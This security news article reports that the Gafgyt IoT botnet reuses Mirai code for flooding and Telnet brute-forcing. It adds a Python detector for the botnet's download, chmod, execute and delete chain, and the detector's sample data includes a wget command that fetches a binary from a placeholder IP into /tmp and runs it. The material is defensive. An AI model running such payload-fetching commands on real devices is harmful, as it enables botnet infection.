Researchers at security analytics firm Uptycs have identified a set of attack methodologies in a dangerous botnet that are also used by the infamous Mirai. The botnet is Gafgyt, first discovered in 2014 (two years before Mirai). The Linux-based IoT botnet primarily targets vulnerable IoT devices, especially Huawei routers, Realtek routers, and ASUS devices, according to the Uptycs blog post.
Uptycs identified five specific areas of Gafgyt's attack code that reuse the same code Mirai used: HTTP flooding, UDP flooding, TCP flooding, the STD module, and Telnet Bruteforce. In each case, researchers drew the connection from Gafgyt to Mirai using threat intelligence systems and their "in-house osquery-based sandbox."
Gafgyt first attacks a vulnerable target device, then downloads a malicious payload. Post-infection, Gafgyt contacts various IP addresses to fetch the payload. The process typically goes like this:
- A wget command is executed to fetch the payload.
- A chmod command is run to make the payload executable.
- The payload begins working inside the target device.
- Once the attack is complete and the device belongs to the Gafgyt botnet, the payload is removed.
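The four-step chain above (fetch, chmod, execute, delete) is a useful detection signal on its own. The following is an added example, not code from the Uptycs post or this article: a small detector run over constructed process-event records shaped like osquery's process_events rows. The field names (time, parent, pid, path, cmdline) and the sample events are assumptions.

```python
import json
import shlex
from collections import defaultdict

# Constructed sample: process-event records shaped like osquery's process_events
# rows (assumed field names). Parent pid 500 is a shell running the four-step
# chain; parent pid 700 only downloads a text file and must not be flagged.
SAMPLE_EVENTS = """
{"time": 100, "parent": 500, "pid": 501, "path": "/usr/bin/wget", "cmdline": "wget http://203.0.113.10/bins/x86 -O /tmp/x86"}
{"time": 101, "parent": 500, "pid": 502, "path": "/bin/chmod", "cmdline": "chmod +x /tmp/x86"}
{"time": 102, "parent": 500, "pid": 503, "path": "/tmp/x86", "cmdline": "/tmp/x86"}
{"time": 103, "parent": 500, "pid": 504, "path": "/bin/rm", "cmdline": "rm -f /tmp/x86"}
{"time": 200, "parent": 700, "pid": 701, "path": "/usr/bin/wget", "cmdline": "wget https://example.org/readme.txt -O /tmp/readme.txt"}
""".strip().splitlines()

STAGES = ("fetch", "chmod", "exec", "cleanup")
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

def stage_of(ev):
    """Map one event to (stage, target file), or None if it is not part of the chain."""
    argv = shlex.split(ev["cmdline"])
    name = argv[0].rsplit("/", 1)[-1]
    if name == "wget":
        # the dropped file is the -O argument; a bare wget writes into the cwd instead
        return ("fetch", argv[argv.index("-O") + 1]) if "-O" in argv else None
    if name == "chmod" and len(argv) >= 3:
        return "chmod", argv[-1]
    if name == "rm":
        return "cleanup", argv[-1]
    if ev["path"].startswith(SCRATCH_DIRS):
        return "exec", ev["path"]  # a binary executed straight out of a scratch dir
    return None

def find_chains(lines, window=60):
    """One finding per (parent pid, dropped file) completing every stage within `window` seconds."""
    seen = defaultdict(dict)  # (parent pid, file) -> {stage: time}
    for line in lines:
        ev = json.loads(line)
        hit = stage_of(ev)
        if hit:
            seen[(ev["parent"], hit[1])][hit[0]] = ev["time"]
    findings = []
    for (parent, target), stages in seen.items():
        if all(s in stages for s in STAGES) and stages["cleanup"] - stages["fetch"] <= window:
            findings.append({"parent": parent, "file": target, "first_seen": stages["fetch"]})
    return findings

if __name__ == "__main__":
    for f in find_chains(SAMPLE_EVENTS):
        print(f"download-chmod-exec-delete chain under pid {f['parent']}: {f['file']}")
```

A lone download or chmod never alerts on its own; only the full sequence on the same file under the same parent does, which keeps the rule quiet on routine administration.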
Much of Mirai's source code is readily available, and considering it was arguably the most dangerous botnet in history, it makes sense that other threat actors would reuse its code. The Uptycs blog post says as much, along with giving defense tips, in the following excerpt:
Malware authors may not always innovate, and researchers often discover that malware authors copy and re-use leaked malware source code. In order to identify and protect against these kinds of malware attacks, we recommend the following measures:
- Regularly monitor the suspicious processes, events, and network traffic spawned on the execution of any untrusted binary.
- Keep systems and firmware updated with the latest releases and patches.
Botnets rely on vulnerable systems to operate. The less open to attack a target is, the less likely it will be successfully attacked.
Featured image: Flickr/Steven Lilley